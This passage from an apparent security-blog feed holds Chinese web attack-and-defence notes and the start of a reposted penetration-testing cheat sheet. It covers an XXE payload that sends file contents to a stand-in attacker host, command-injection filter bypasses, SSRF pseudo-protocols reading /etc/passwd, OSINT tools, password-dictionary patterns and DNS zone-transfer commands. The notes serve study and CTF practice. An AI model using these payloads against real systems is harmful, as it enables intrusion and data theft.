class="headerlink" title="无回显"></a>Without output (out-of-band)</h5><ul><li><p>First read the target file through <code>php://filter</code>, then send its contents in an HTTP request to the server that collects the data (the attacker's server, xxx.xxx.xxx below).</p><div class="language-xml"><span class="lang">xml</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #89DDFF"><!</span><span style="color: #F78C6C">DOCTYPE</span><span style="color: #89DDFF"> </span><span style="color: #BABED8">updateProfile</span><span style="color: #89DDFF"> [</span></span><span class="line"><span style="color: #89DDFF"> <!</span><span style="color: #F78C6C">ENTITY</span><span style="color: #89DDFF"> % </span><span style="color: #BABED8">file</span><span style="color: #F78C6C"> SYSTEM </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">php://filter/read=convert.base64-encode/resource=./target.php</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">></span></span><span class="line"><span style="color: #89DDFF"> <!</span><span style="color: #F78C6C">ENTITY</span><span style="color: #89DDFF"> % </span><span style="color: #BABED8">dtd</span><span style="color: 
#F78C6C"> SYSTEM </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">http://xxx.xxx.xxx/evil.dtd</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">></span></span><span class="line"><span style="color: #89DDFF"> %dtd;</span></span><span class="line"><span style="color: #89DDFF"> %send;</span></span><span class="line"><span style="color: #89DDFF">]></span></span></code></pre></div><p>evil.dtd:</p><div class="language-xml"><button title="Copy code" class="copy"></button><span class="lang">xml</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #BABED8"><!ENTITY % all</span></span><span class="line"><span style="color: #BABED8"> "<!ENTITY </span><span style="color: #89DDFF">&</span><span style="color: #BABED8">#x25</span><span style="color: #89DDFF">;</span><span style="color: #BABED8"> send SYSTEM 'http://xxx.xxx.xxx/?data=%file;'>"</span></span><span class="line"><span style="color: #BABED8">></span></span><span class="line"><span style="color: #BABED8">%all;</span></span></code></pre></div></li></ul><h3 id="利用场景"><a href="#利用场景" class="headerlink" title="利用场景"></a>利用场景</h3><ul><li><p>svg</p></li><li><p>excel</p><p><a href="https://xz.aliyun.com/t/3741">利用EXCEL进行XXE攻击 - 先知社区 (aliyun.com)</a></p></li></ul><h3 id="防御"><a href="#防御" class="headerlink" title="防御"></a>防御</h3><ul><li>禁用dtd实体引用</li><li>过滤关键词</li></ul><h2 id="RCE-–-远程代码执行漏洞"><a href="#RCE-–-远程代码执行漏洞" class="headerlink" title="RCE – 远程代码执行漏洞"></a>RCE – 远程代码执行漏洞</h2><h3 id="原理-2"><a href="#原理-2" class="headerlink" title="原理"></a>原理</h3><ul><li><p><strong>系统命令执行函数</strong></p><div class="language-apl"><button title="Copy code" class="copy"></button><span class="lang">apl</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #BABED8">system</span><span style="color: 
#89DDFF">()</span></span><span class="line"><span style="color: #BABED8">passthru</span><span style="color: #89DDFF">()</span></span><span class="line"><span style="color: #BABED8">exec</span><span style="color: #89DDFF">()</span></span><span class="line"><span style="color: #BABED8">shell_exec</span><span style="color: #89DDFF">()</span></span><span class="line"><span style="color: #BABED8">popen</span><span style="color: #89DDFF">()</span></span><span class="line"><span style="color: #BABED8">proc_open</span><span style="color: #89DDFF">()</span></span><span class="line"><span style="color: #BABED8">pcntl_exec</span><span style="color: #89DDFF">()</span></span></code></pre></div></li><li><p><strong>系统命令拼接方式</strong></p><ul><li><code>|</code> , <code>||</code></li><li><code>&</code>, <code>&&</code></li><li><code>;</code></li><li><code>%0a</code></li></ul></li></ul><h3 id="绕过-1"><a href="#绕过-1" class="headerlink" title="绕过"></a>绕过</h3><p><a href="https://blog.csdn.net/jdhellfire/article/details/121969060">常见操作系统命令注入思路_命令注入 bypass-CSDN博客</a></p><h4 id="通配符绕过"><a href="#通配符绕过" class="headerlink" title="通配符绕过"></a>通配符绕过</h4><div class="language-php"><button title="Copy code" class="copy"></button><span class="lang">php</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #82AAFF">system</span><span style="color: #89DDFF">(</span><span style="color: #BABED8">‘tac fla</span><span style="color: #89DDFF">*</span><span style="color: #89DDFF">.</span><span style="color: #BABED8">php’</span><span style="color: #89DDFF">);</span></span></code></pre></div><h4 id="参数逃逸"><a href="#参数逃逸" class="headerlink" title="参数逃逸"></a>参数逃逸</h4><div class="language-php"><button title="Copy code" class="copy"></button><span class="lang">php</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #82AAFF">eval</span><span 
style="color: #89DDFF">($</span><span style="color: #BABED8">GET</span><span style="color: #89DDFF">[</span><span style="color: #F78C6C">1</span><span style="color: #89DDFF">]);&</span><span style="color: #F78C6C">1</span><span style="color: #89DDFF">=</span><span style="color: #82AAFF">system</span><span style="color: #89DDFF">(</span><span style="color: #BABED8">‘tac flag</span><span style="color: #89DDFF">.</span><span style="color: #BABED8">php’</span><span style="color: #89DDFF">);</span></span></code></pre></div><h4 id="包含-伪协议"><a href="#包含-伪协议" class="headerlink" title="包含&伪协议"></a>包含&伪协议</h4><div class="language-php"><button title="Copy code" class="copy"></button><span class="lang">php</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #BABED8">include</span><span style="color: #89DDFF">$</span><span style="color: #BABED8">_ GET</span><span style="color: #89DDFF">[</span><span style="color: #BABED8">a</span><span style="color: #89DDFF">]?></span><span style="color: #C792EA">&</span><span style="color: #BABED8">a</span><span style="color: #89DDFF">=</span><span style="color: #BABED8">data</span><span style="color: #89DDFF">:</span><span style="color: #676E95; font-style: italic">//text/plain,<?=system('tac flag.php');</span><span style="color: #89DDFF">?></span></span><span class="line"><span style="color: #BABED8">include</span><span style="color: #89DDFF">$</span><span style="color: #BABED8">_GET</span><span style="color: #89DDFF">[</span><span style="color: #BABED8">a</span><span style="color: #89DDFF">]?></span><span style="color: #C792EA">&</span><span style="color: #BABED8">a</span><span style="color: #89DDFF">=</span><span style="color: #BABED8">php</span><span style="color: #89DDFF">:</span><span style="color: #676E95; font-style: italic">//filter/read=convert.base64-encode/resource=flag.php</span></span></code></pre></div><h4 id="花括号"><a href="#花括号" 
class="headerlink" title="花括号{}"></a>花括号<code>{}</code></h4><ul><li>在Linux bash中还可以使用<code>{xxxx}</code>来执行系统命令</li></ul><div class="language-sh"><button title="Copy code" class="copy"></button><span class="lang">sh</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #89DDFF">{</span><span style="color: #FFCB6B">cat,flag}</span></span></code></pre></div><h4 id="斜杠"><a href="#斜杠" class="headerlink" title="斜杠"></a>斜杠</h4><ul><li><p>路径 /</p></li><li><p>\是在正则等语法里面,表示后面跟的字符是正常字符,不需要转义。</p></li><li><p>也就意味着,我们可以在rce漏洞,过滤掉<code>cat ls</code>等命令时候,直接使用<code>ca\t</code>来实现绕过</p></li></ul><h4 id="空格过滤"><a href="#空格过滤" class="headerlink" title="空格过滤"></a>空格过滤</h4><ul><li>< 、<>、%20(space)、%09(tab)、$IFS$9、 ${IFS}、$IFS等</li></ul><h4 id="一些命令分隔符"><a href="#一些命令分隔符" class="headerlink" title="一些命令分隔符"></a>一些命令分隔符</h4><p>linux中:<code>%0a(回车) 、%0d(换行) 、; 、& 、| 、&&、||</code><br>windows中:<code>%0a、&、|、%1a(一个神奇的角色,作为.bat文件中的命令分隔符)</code></p><h3 id="黑名单绕过"><a href="#黑名单绕过" class="headerlink" title="黑名单绕过"></a>黑名单绕过</h3><h4 id="拼接绕过"><a href="#拼接绕过" class="headerlink" title="拼接绕过"></a>拼接绕过</h4><ul><li>利用偶读拼接方法绕过黑名单:<code>a=fl;b=ag;cat $a$b</code></li><li>利用.拼接绕过(sy.(st).em)</li></ul><h4 id="编码绕过"><a href="#编码绕过" class="headerlink" title="编码绕过"></a>编码绕过</h4><div class="language-sh"><button title="Copy code" class="copy"></button><span class="lang">sh</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #82AAFF">echo</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">Y2F0wqAK</span><span style="color: #89DDFF">'</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">|</span><span style="color: #BABED8"> </span><span style="color: #FFCB6B">base64</span><span style="color: #BABED8"> </span><span style="color: 
#C3E88D">-d</span></span></code></pre></div><h4 id="单引号和双引号绕过"><a href="#单引号和双引号绕过" class="headerlink" title="单引号和双引号绕过"></a>单引号和双引号绕过</h4><div class="language-sh"><button title="Copy code" class="copy"></button><span class="lang">sh</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #FFCB6B">c</span><span style="color: #FFCB6B">''</span><span style="color: #FFCB6B">t</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">flag</span><span style="color: #BABED8"> </span></span><span class="line"><span style="color: #FFCB6B">ca</span><span style="color: #FFCB6B">""</span><span style="color: #FFCB6B">t</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">flag</span></span></code></pre></div><h4 id="利用Shell-特殊变量绕过"><a href="#利用Shell-特殊变量绕过" class="headerlink" title="利用Shell 特殊变量绕过"></a>利用Shell 特殊变量绕过</h4><p>第一个参数是1,第二个参数是2。而参数不存在时其值为空</p><div class="language-sh"><button title="Copy code" class="copy"></button><span class="lang">sh</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #FFCB6B">ca$@t</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">fla</span><span style="color: #BABED8">$</span><span style="color: #C3E88D">@g</span></span><span class="line"><span style="color: #FFCB6B">ca$1t</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">fla</span><span style="color: #BABED8">$2g</span></span></code></pre></div><h3 id="linux中查看文件内容"><a href="#linux中查看文件内容" class="headerlink" title="linux中查看文件内容"></a>linux中查看文件内容</h3><p>cat、tac、more、less、head、tail、nl、sed、sort、uniq</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: 
#babed8">more:一页一页的显示档案内容</span></span><span class="line"><span style="color: #babed8">less:与 more 类似</span></span><span class="line"><span style="color: #babed8">head:查看头几行</span></span><span class="line"><span style="color: #babed8">tac:从最后一行开始显示,可以看出 tac 是 cat 的反向显示</span></span><span class="line"><span style="color: #babed8">tail:查看尾几行</span></span><span class="line"><span style="color: #babed8">nl:显示的时候,顺便输出行号</span></span><span class="line"><span style="color: #babed8">od:以二进制的方式读取档案内容</span></span><span class="line"><span style="color: #babed8">vi:一种编辑器,这个也可以查看</span></span><span class="line"><span style="color: #babed8">vim:一种编辑器,这个也可以查看</span></span><span class="line"><span style="color: #babed8">sort:可以查看</span></span><span class="line"><span style="color: #babed8">uniq:可以查看</span></span><span class="line"><span style="color: #babed8">file -f:报错出具体内容</span></span></code></pre></div><h2 id="SSRF-–-服务器端请求伪造"><a href="#SSRF-–-服务器端请求伪造" class="headerlink" title="SSRF – 服务器端请求伪造"></a>SSRF – 服务器端请求伪造</h2><ul><li>SSRF 形成的原因大都是由于服务端提供了<strong>从其他服务器应用</strong>获取数据的功能且没有对目标地址做过滤与限制。</li></ul><h3 id="SSRF漏洞挖掘"><a href="#SSRF漏洞挖掘" class="headerlink" title="SSRF漏洞挖掘"></a>SSRF漏洞挖掘</h3><h4 id="漏洞产生场景"><a href="#漏洞产生场景" class="headerlink" title="漏洞产生场景"></a>漏洞产生场景</h4><ul><li><p>分享:通过URL地址分享网页内容</p></li><li><p>转码服务: 通过URL地址把原地址的网页内容调优使其适合手机屏幕浏览</p></li><li><p>在线翻译:通过URL地址翻译对应文本的内容</p></li><li><p>图片、文章收藏功能</p></li><li><p>未公开的api实现以及其他调用URL的功能</p></li><li><p>图片加载与下载:通过URL地址加载或下载图片</p></li><li><p>从URL关键字中寻找, 利用google 语法加上这些关键字去寻找SSRF漏洞</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">share wap url link src source target u display sourceURl imageURL domain</span></span></code></pre></div></li></ul><h4 id="产生SSRF漏洞的函数"><a href="#产生SSRF漏洞的函数" class="headerlink" 
title="产生SSRF漏洞的函数"></a>产生SSRF漏洞的函数</h4><h5 id="file-get-contents"><a href="#file-get-contents" class="headerlink" title="file_get_contents"></a>file_get_contents</h5><p>从指定url获取文件:</p><div class="language-php"><button title="Copy code" class="copy"></button><span class="lang">php</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #89DDFF">$</span><span style="color: #BABED8">content </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">file_get_contents</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">_POST</span><span style="color: #89DDFF">[</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">url</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">]);</span><span style="color: #BABED8"> </span></span></code></pre></div><h5 id="fsockopen"><a href="#fsockopen" class="headerlink" title="fsockopen()"></a>fsockopen()</h5><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">$fp = fsockopen($host, intval($port), $errno, $errstr, 30); </span></span></code></pre></div><h5 id="curl-exec"><a href="#curl-exec" class="headerlink" title="curl_exec()"></a>curl_exec()</h5><div class="language-php"><button title="Copy code" class="copy"></button><span class="lang">php</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #89DDFF">$</span><span style="color: #BABED8">link </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">_POST</span><span style="color: #89DDFF">[</span><span style="color: 
#89DDFF">'</span><span style="color: #C3E88D">url</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">];</span></span><span class="line"><span style="color: #89DDFF">$</span><span style="color: #BABED8">curlobj </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">curl_init</span><span style="color: #89DDFF">();</span></span><span class="line"><span style="color: #82AAFF">curl_setopt</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">curlobj</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> CURLOPT_POST</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0</span><span style="color: #89DDFF">);</span></span><span class="line"><span style="color: #82AAFF">curl_setopt</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">curlobj</span><span style="color: #89DDFF">,</span><span style="color: #BABED8">CURLOPT_URL</span><span style="color: #89DDFF">,$</span><span style="color: #BABED8">link</span><span style="color: #89DDFF">);</span></span><span class="line"><span style="color: #82AAFF">curl_setopt</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">curlobj</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> CURLOPT_RETURNTRANSFER</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">1</span><span style="color: #89DDFF">);</span></span><span class="line"><span style="color: #89DDFF">$</span><span style="color: #BABED8">result</span><span style="color: #89DDFF">=</span><span style="color: #82AAFF">curl_exec</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">curlobj</span><span style="color: #89DDFF">);</span></span></code></pre></div><h3 id="SSRF中URL的伪协议"><a href="#SSRF中URL的伪协议" class="headerlink" 
title="SSRF中URL的伪协议"></a>SSRF中URL的伪协议</h3><p><strong>当我们发现SSRF漏洞后,首先要做的事情就是测试所有可用的URL伪协议</strong></p><blockquote><span class="custom-blockquote-svg"><svg width="24" height="24" viewBox="0 0 24 24" fill="" xmlns="http://www.w3.org/2000/svg" data-reactroot=""><path fill="" d="M22 12C22 6.5 17.5 2 12 2C6.5 2 2 6.5 2 12C2 17.5 6.5 22 12 22C13.8 22 15.5 21.5 17 20.6L22 22L20.7 17C21.5 15.5 22 13.8 22 12Z" undefined="1"></path><path fill="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z" undefined="1"></path><path fill="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z" undefined="1"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M17 8.5C15.23 8.97 14.07 10.84 14.01 13.27C14 13.33 14 13.4 14 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M9 8.5C7.23 8.97 6.07 10.84 6.01 13.27C6 13.33 6 13.4 6 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z"></path></svg></span><p>file:/// 从文件系统中获取文件内容,如,xxxxxx.com/index.php?url=file:///etc/passwd<br>dict:// 字典服务器协议,访问字典资源,如,dict:///ip:6739/info:<br>sftp:// SSH文件传输协议或安全文件传输协议<br>ldap:// 轻量级目录访问协议, url=ldap://localhost:1337/%0astats%0aqui<br>tftp:// 简单文件传输协议<br>gopher:// 
分布式文档传递服务,可使用<strong>gopherus</strong>生成payload</p></blockquote>]]></content>
<summary type="html"><h1 id="WEB攻防-通用漏洞"><a href="#WEB攻防-通用漏洞" class="headerlink" title="Web Attack and Defense: Common Vulnerabilities"></a>Web Attack and Defense: Common Vulnerabilities</h1><p>Large practice ranges: <a href="https://vulhub.org/#/envi</summary>
</entry>
<entry>
<title>(Repost) Knowledge Point Collection</title>
<link href="https://myprefer.github.io/post/%E8%BD%AC-%E7%9F%A5%E8%AF%86%E7%82%B9%E5%90%88%E9%9B%86.html"/>
<id>https://myprefer.github.io/post/%E8%BD%AC-%E7%9F%A5%E8%AF%86%E7%82%B9%E5%90%88%E9%9B%86.html</id>
<published>2024-03-05T15:07:07.000Z</published>
<updated>2024-03-11T03:21:52.691Z</updated>
<content type="html"><![CDATA[<p> Author: <a href="https://twitter.com/Evi1cg">Evi1cg</a><br> Blog: <a href="https://evi1cg.github.io/">https://evi1cg.github.io</a></p><h2 id="信息搜集"><a href="#信息搜集" class="headerlink" title="信息搜集"></a>信息搜集</h2><h3 id="开源情报信息收集(OSINT)"><a href="#开源情报信息收集(OSINT)" class="headerlink" title="开源情报信息收集(OSINT)"></a>开源情报信息收集(OSINT)</h3><h4 id="github"><a href="#github" class="headerlink" title="github"></a>github</h4><ul><li>Github_Nuggests(自动爬取Github上文件敏感信息泄露) :<a href="https://github.com/az0ne/Github_Nuggests">https://github.com/az0ne/Github_Nuggests</a></li><li>GSIL(能够实现近实时(15分钟内)的发现Github上泄露的信息) :<a href="https://github.com/FeeiCN/GSIL">https://github.com/FeeiCN/GSIL</a></li><li>x-patrol(小米团队的):<a href="https://github.com/MiSecurity/x-patrol">https://github.com/MiSecurity/x-patrol</a></li></ul><h4 id="whois查询-注册人反查-邮箱反查-相关资产"><a href="#whois查询-注册人反查-邮箱反查-相关资产" class="headerlink" title="whois查询/注册人反查/邮箱反查/相关资产"></a>whois查询/注册人反查/邮箱反查/相关资产</h4><ul><li>站长之家:<a href="http://whois.chinaz.com/?DomainName=target.com&ws=">http://whois.chinaz.com/?DomainName=target.com&ws=</a></li><li>爱站:<a href="https://whois.aizhan.com/target.com/">https://whois.aizhan.com/target.com/</a></li><li>微步在线:<a href="https://x.threatbook.cn/">https://x.threatbook.cn/</a></li><li>IP反查:<a href="https://dns.aizhan.com/">https://dns.aizhan.com/</a></li><li>天眼查:<a href="https://www.tianyancha.com/">https://www.tianyancha.com/</a></li><li>虎妈查:<a href="http://www.whomx.com/">http://www.whomx.com/</a></li><li>历史漏洞查询 :<ul><li>在线查询:<a href="http://wy.zone.ci/">http://wy.zone.ci/</a></li><li>自搭建:<a href="https://github.com/hanc00l/wooyun_public/">https://github.com/hanc00l/wooyun_public/</a></li></ul></li></ul><h4 id="google-hacking"><a href="#google-hacking" class="headerlink" title="google hacking"></a>google hacking</h4><h3 id="创建企业密码字典"><a href="#创建企业密码字典" class="headerlink" title="创建企业密码字典"></a>创建企业密码字典</h3><h4 id="字典列表"><a href="#字典列表" class="headerlink" 
title="字典列表"></a>字典列表</h4><ul><li>passwordlist:<a href="https://github.com/lavalamp-/password-lists">https://github.com/lavalamp-/password-lists</a></li><li>猪猪侠字典:<a href="https://pan.baidu.com/s/1dFJyedz">https://pan.baidu.com/s/1dFJyedz</a><br><a href="https://github.com/rootphantomer/Blasting_dictionary">Blasting_dictionary</a>(分享和收集各种字典,包括弱口令,常用密码,目录爆破。数据库爆破,编辑器爆破,后台爆破等) </li><li>针对特定的厂商,重点构造厂商相关域名的字典</li></ul><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">['%pwd%123','%user%123','%user%521','%user%2017','%pwd%321','%pwd%521','%user%321','%pwd%123!','%pwd%123!@#','%pwd%1234','%user%2016','%user%123$%^','%user%123!@#','%pwd%2016','%pwd%2017','%pwd%1!','%pwd%2@','%pwd%3#','%pwd%123#@!','%pwd%12345','%pwd%123$%^','%pwd%!@#456','%pwd%123qwe','%pwd%qwe123','%pwd%qwe','%pwd%123456','%user%123#@!','%user%!@#456','%user%1234','%user%12345','%user%123456','%user%123!']</span></span></code></pre></div><h4 id="密码生成"><a href="#密码生成" class="headerlink" title="密码生成"></a>密码生成</h4><ul><li>GenpAss(中国特色的弱口令生成器: <a href="https://github.com/RicterZ/genpAss/">https://github.com/RicterZ/genpAss/</a></li><li>passmaker(可以自定义规则的密码字典生成器) :<a href="https://github.com/bit4woo/passmaker">https://github.com/bit4woo/passmaker</a></li><li>pydictor(强大的密码生成器) :<a href="https://github.com/LandGrey/pydictor">https://github.com/LandGrey/pydictor</a></li></ul><h4 id="邮箱列表获取"><a href="#邮箱列表获取" class="headerlink" title="邮箱列表获取"></a>邮箱列表获取</h4><ul><li>theHarvester :<a href="https://github.com/laramies/theHarvester">https://github.com/laramies/theHarvester</a></li><li>获取一个邮箱以后导出通讯录 </li><li>LinkedInt :<a href="https://github.com/mdsecactivebreach/LinkedInt">https://github.com/mdsecactivebreach/LinkedInt</a></li><li>Mailget:<a 
href="https://github.com/Ridter/Mailget">https://github.com/Ridter/Mailget</a></li></ul><h4 id="泄露密码查询"><a href="#泄露密码查询" class="headerlink" title="泄露密码查询"></a>泄露密码查询</h4><ul><li>ghostproject: <a href="https://ghostproject.fr/">https://ghostproject.fr/</a></li><li>pwndb: <a href="https://pwndb2am4tzkvold.onion.to/">https://pwndb2am4tzkvold.onion.to/</a></li></ul><h4 id="对企业外部相关信息进行搜集"><a href="#对企业外部相关信息进行搜集" class="headerlink" title="对企业外部相关信息进行搜集"></a>对企业外部相关信息进行搜集</h4><h5 id="子域名获取"><a href="#子域名获取" class="headerlink" title="子域名获取"></a>子域名获取</h5><ul><li>Layer子域名挖掘机4.2纪念版 </li><li>subDomainsBrute :<a href="https://github.com/lijiejie/subDomainsBrute">https://github.com/lijiejie/subDomainsBrute</a></li><li>wydomain :<a href="https://github.com/ring04h/wydomain">https://github.com/ring04h/wydomain</a></li><li>Sublist3r :<a href="https://github.com/aboul3la/Sublist3r">https://github.com/aboul3la/Sublist3r</a></li><li>企查查:<a href="https://www.qcc.com/">https://www.qcc.com/</a></li><li>天眼查:<a href="https://www.tianyancha.com/">https://www.tianyancha.com/</a></li><li>site:target.com:<a href="https://www.google.com/">https://www.google.com</a></li><li>Github代码仓库 </li><li>抓包分析请求返回值(跳转/文件上传/app/api接口等) </li><li>站长帮手links等在线查询网站 </li><li>域传送漏洞</li></ul><blockquote><span class="custom-blockquote-svg"><svg width="24" height="24" viewBox="0 0 24 24" fill="" xmlns="http://www.w3.org/2000/svg" data-reactroot=""><path fill="" d="M22 12C22 6.5 17.5 2 12 2C6.5 2 2 6.5 2 12C2 17.5 6.5 22 12 22C13.8 22 15.5 21.5 17 20.6L22 22L20.7 17C21.5 15.5 22 13.8 22 12Z" undefined="1"></path><path fill="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z" undefined="1"></path><path fill="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z" undefined="1"></path><path stroke-linejoin="round" 
stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M17 8.5C15.23 8.97 14.07 10.84 14.01 13.27C14 13.33 14 13.4 14 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M9 8.5C7.23 8.97 6.07 10.84 6.01 13.27C6 13.33 6 13.4 6 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z"></path></svg></span><p>Linux</p></blockquote><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">dig @ns.example.com example=.com AXFR </span></span></code></pre></div><p>Windows</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">nslookup -type=ns xxx.yyy.cn #查询解析某域名的DNS服务器</span></span><span class="line"><span style="color: #babed8">nslookup #进入nslookup交互模式</span></span><span class="line"><span style="color: #babed8">server dns.domian.com #指定dns服务器</span></span><span class="line"><span style="color: #babed8">ls xxx.yyy.cn #列出域信息</span></span></code></pre></div><ul><li>GetDomainsBySSL.py :<a 
href="https://note.youdao.com/ynoteshare1/index.html?id=247d97fc1d98b122ef9804906356d47a&type=note#/">https://note.youdao.com/ynoteshare1/index.html?id=247d97fc1d98b122ef9804906356d47a&type=note#/</a></li><li>censys.io证书 :<a href="https://censys.io/certificates?q=target.com">https://censys.io/certificates?q=target.com</a></li><li>crt.sh证书查询:<a href="https://crt.sh/?q=%25.target.com">https://crt.sh/?q=%25.target.com</a></li><li>shadon :<a href="https://www.shodan.io/">https://www.shodan.io/</a></li><li>zoomeye :<a href="https://www.zoomeye.org/">https://www.zoomeye.org/</a></li><li>fofa :<a href="https://fofa.so/">https://fofa.so/</a></li><li>censys:<a href="https://censys.io/">https://censys.io/</a></li><li>dnsdb.io :<a href="https://dnsdb.io/zh-cn/search?q=target.com">https://dnsdb.io/zh-cn/search?q=target.com</a></li><li>api.hackertarget.com :<a href="http://api.hackertarget.com/reversedns/?q=target.com">http://api.hackertarget.com/reversedns/?q=target.com</a></li><li>community.riskiq.com :<a href="https://community.riskiq.com/Search/target.com">https://community.riskiq.com/Search/target.com</a></li><li>subdomain3 :<a href="https://github.com/yanxiu0614/subdomain3">https://github.com/yanxiu0614/subdomain3</a></li><li>FuzzDomain :<a href="https://github.com/Chora10/FuzzDomain">https://github.com/Chora10/FuzzDomain</a></li><li>dnsdumpster.com :<a href="https://dnsdumpster.com/">https://dnsdumpster.com/</a></li><li>phpinfo.me :<a href="https://phpinfo.me/domain/">https://phpinfo.me/domain/</a></li><li>dns开放数据接口 :<a href="https://dns.bufferover.run/dns?q=baidu.com">https://dns.bufferover.run/dns?q=baidu.com</a></li></ul><h2 id="进入内网"><a href="#进入内网" class="headerlink" title="进入内网"></a>进入内网</h2><h3 id="基于企业弱账号漏洞"><a href="#基于企业弱账号漏洞" class="headerlink" title="基于企业弱账号漏洞"></a>基于企业弱账号漏洞</h3><ul><li>VPN(通过邮箱,密码爆破,社工等途径获取VPN) </li><li>企业相关运维系统(zabbix等)</li></ul><h3 